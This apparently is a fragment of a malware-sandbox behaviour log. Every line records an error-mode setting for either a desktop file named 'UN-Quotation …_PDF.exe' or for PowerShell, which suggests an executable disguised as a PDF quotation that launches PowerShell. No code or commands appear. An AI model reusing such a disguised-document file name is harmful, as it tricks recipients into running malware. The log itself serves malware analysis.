                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\Desktop\UN-Quotation 70000000187366444_PDF.exeProcess information set: NOOPENFILEERRORBOX
